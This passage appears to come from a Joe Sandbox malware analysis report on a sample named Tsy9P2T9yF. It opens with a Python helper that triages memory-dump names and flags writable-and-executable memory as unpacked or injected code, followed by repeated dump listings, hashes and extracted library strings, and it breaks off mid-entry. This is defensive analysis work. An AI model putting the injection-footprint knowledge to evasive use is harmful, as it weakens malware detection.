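Added example; not code from the Joe Sandbox report.  The .sdmp name layout
(<proc>.<phase>.<dumpid>.<base>.<protect>.<f6>.<memtype>.<f8>.sdmp) is an
assumption inferred from the names on this page; only <base>, <protect> and
<memtype> are interpreted, with the documented Win32 PAGE_* / MEM_* values.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# "Source File: <name>.sdmp, Offset: <hex>, based on PE: <true|false>"
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+?\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)",
    re.IGNORECASE,
)
# Assumed layout of the dump name (see the lead-in); f6 and f8 are not decoded.
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<phase>[0-9a-f]{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<f6>[0-9a-f]{8})\."
    r"(?P<memtype>[0-9a-f]{8})\.(?P<f8>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Region:
    base: int          # start of the dumped region
    offset: int        # module/allocation base the report relates it to
    protect: int       # PAGE_* value
    mem_type: int      # MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE
    based_on_pe: bool  # Joe Sandbox could relate the dump to a PE header

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def rwx(self) -> bool:
        p = self.protect & 0xFF
        return p in EXECUTABLE and p in WRITABLE

    def verdict(self) -> str:
        # Writable+executable memory that is not an image mapping and has no
        # PE header is the classic footprint of an unpacker stub or injected code.
        if self.rwx and self.mem_type == 0x20000 and not self.based_on_pe:
            return "unpacked/injected code: RWX private memory not backed by a PE"
        # RWX inside the mapped image means section rights were changed at run
        # time (in-place unpacking), matching "changes PE section rights".
        if self.rwx and self.mem_type == 0x1000000:
            return "section rights changed: RWX page inside the mapped image"
        if self.rwx:
            return "RWX memory"
        return "nothing notable"


def parse_source_line(line: str) -> Region:
    m = SOURCE_RE.search(line)
    if not m:
        raise ValueError(f"not a Source File line: {line!r}")
    n = SDMP_RE.match(m["name"])
    if not n:
        raise ValueError(f"unexpected dump name: {m['name']!r}")
    return Region(
        base=int(n["base"], 16),
        offset=int(m["offset"], 16),
        protect=int(n["protect"], 16),
        mem_type=int(n["memtype"], 16),
        based_on_pe=m["pe"].lower() == "true",
    )


def triage(lines: list[str]) -> list[tuple[str, str, str, str]]:
    """(base, protection, type, verdict) for every Source File line, in order."""
    out = []
    for line in lines:
        r = parse_source_line(line)
        out.append((f"{r.base:08x}", r.protect_name, r.type_name, r.verdict()))
    return out


# The two Source File lines that appear in this report.
REPORT_LINES = [
    "• Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false",
    "• Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true",
]

if __name__ == "__main__":
    for row in triage(REPORT_LINES):
        print(*row)
```

Run on the two lines from this report, the private 0x07120000 region comes out as RWX MEM_PRIVATE with no PE header (the unpacked code the functions above live in), and the 0x004B1000 region as an RWX page inside the mapped image, which is the run-time section-rights change the report's signature list also flags.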
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                               • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                              • API String ID: 0-1371176463
                                                              • Opcode ID: b2b6b854013c54d399aae2976081cd314a994d51b5f8c644bb3d5129ff5ccc13
                                                              • Instruction ID: 1b52aecbdd0629cab70b0e61a15e82b146142cfd873613f6fce77698cdb57d0d
                                                              • Opcode Fuzzy Hash: b2b6b854013c54d399aae2976081cd314a994d51b5f8c644bb3d5129ff5ccc13
                                                              • Instruction Fuzzy Hash: E5B24A71A08705ABD7209B24DD42B7777D1AF84308F08842EFA8D97392E7F9EC41975A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                               • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $d$nil)
                                                              • API String ID: 0-394766432
                                                              • Opcode ID: 849b7c2fb0b6a83f91c5334a0cdeb96ec823e2c64e6905dcff1e077f120b2a82
                                                              • Instruction ID: 911a28e93fb26566dd02e68007936d10a61dc682c3f3d6490f7b144fc645bf5f
                                                              • Opcode Fuzzy Hash: 849b7c2fb0b6a83f91c5334a0cdeb96ec823e2c64e6905dcff1e077f120b2a82
                                                              • Instruction Fuzzy Hash: D11326706087458FD720CF28C58062ABBE1FFD9358F24496DEA95DB3A1D771EC458B82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                               • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                              • API String ID: 0-122532811
                                                              • Opcode ID: 95ea30881b99098b5f5050044a9c44e1a97b100208e09b782ffc5718b116a57d
                                                              • Instruction ID: 2f07119918313bea61bf366057ae8a14f289fad34444d7e8743bb4224e201085
                                                              • Opcode Fuzzy Hash: 95ea30881b99098b5f5050044a9c44e1a97b100208e09b782ffc5718b116a57d
                                                              • Instruction Fuzzy Hash: A8420675B08700AFD708DE28CC91F6BB7E6EBC4704F04892DF55997291D779AC048B96
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                               • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                              • API String ID: 0-3977460686
                                                              • Opcode ID: 52582d26c6d78c389c6ee5694f7ffc7847a4b81ceeb79bc220fa23df2c700c18
                                                              • Instruction ID: bd2df46940015675ac9a9184af2cf05accfa667862dc5d2fb89095ea7aebf243
                                                              • Opcode Fuzzy Hash: 52582d26c6d78c389c6ee5694f7ffc7847a4b81ceeb79bc220fa23df2c700c18
                                                              • Instruction Fuzzy Hash: 4C327B79A043014BC7609F288D61B5B7BD5ABD1324F04472FF9A58B3D2E73CD942878A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                               • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                              • API String ID: 0-1914377741
                                                              • Opcode ID: aaea19f3173fc3c4e0d565136fe2d43462bd81a6af8b2df73a500efeecef4414
                                                              • Instruction ID: 573e25d6773927291dc229e5c8a6bf80acffba10d34a296c2638f6e3fb67961a
                                                              • Opcode Fuzzy Hash: aaea19f3173fc3c4e0d565136fe2d43462bd81a6af8b2df73a500efeecef4414
                                                              • Instruction Fuzzy Hash: 56724A30608B419FE7258A18C4667A777D29F91344F08861FED884B393EF7ED884C79A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                               • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: attempts$ndot$retr$retr$rota$time$use-$usev
                                                              • API String ID: 0-2058201250
                                                              • Opcode ID: 0bec12a31213a5438d128b343f16dfc0fce8f6c0f62b2016e91504f181c308f9
                                                              • Instruction ID: 29d7c1a3093c60f03cdf04247cac9be0179bd3e62432286b190f3a60c70b3c0e
                                                              • Opcode Fuzzy Hash: 0bec12a31213a5438d128b343f16dfc0fce8f6c0f62b2016e91504f181c308f9
                                                              • Instruction Fuzzy Hash: 4561E6A5A083016BE714A624AC57B3BBA9DBBD4304F04883DF84E97293FE71D914D293
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                               • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                                              • API String ID: 0-3476178709
                                                              • Opcode ID: cc3df8b4801fd7e768650ced8dba0704544cd5e2446f0eefe4d3fc5cc0d43001
                                                              • Instruction ID: b3bfee78ce01a483bf3ff38f0f92fe7d6cb961cb3677dee7dc7a87f56a9e1357
                                                              • Opcode Fuzzy Hash: cc3df8b4801fd7e768650ced8dba0704544cd5e2446f0eefe4d3fc5cc0d43001
                                                              • Instruction Fuzzy Hash: 9731F8B6B54A4526F7A80109DC46F3E005BC3D5B14F7AC23FB5179B2C1D8E9AD4142AE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                               • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                                              • API String ID: 0-2550110336
                                                              • Opcode ID: c479b304e14f6addeae4c4e636712a066436f6110833be0a285b24ac6589537d
                                                              • Instruction ID: 9df6e29c6bfc309cdd73c0a6576744fbf5d9dfa1f359c8e33a7fc031c3f4cbae
                                                              • Opcode Fuzzy Hash: c479b304e14f6addeae4c4e636712a066436f6110833be0a285b24ac6589537d
                                                              • Instruction Fuzzy Hash: 07325970748304ABE7206E289C53F7A7797AF82B08F18C52EF95D5E3C2E770D9908656
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                               • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $.$;$?$?$xn--$xn--
                                                              • API String ID: 0-543057197
                                                              • Opcode ID: d4e4ecb53561e2855850717e38347b30448c6281f1373dc7c83c9996fd659fb6
                                                              • Instruction ID: 58f7df7014672909839a056c18650a1b5017587373d086bff9b6e765826db245
                                                              • Opcode Fuzzy Hash: d4e4ecb53561e2855850717e38347b30448c6281f1373dc7c83c9996fd659fb6
                                                              • Instruction Fuzzy Hash: 6922E6B2A043029BEB10EA24EC45B6B7AD5BFD5348F04893CF85D97292E735DD08D792
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                               • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                              • API String ID: 0-2555271450
                                                              • Opcode ID: a163642260b73a3b98f3c353f8575ba4997161dae81e2d2ec74ffd0d2212dc40
                                                              • Instruction ID: 5a4f8fbfb5c6a5870dd580cc3d4bf93932fe75d7e90307ffcd3f3bdb6a379d1e
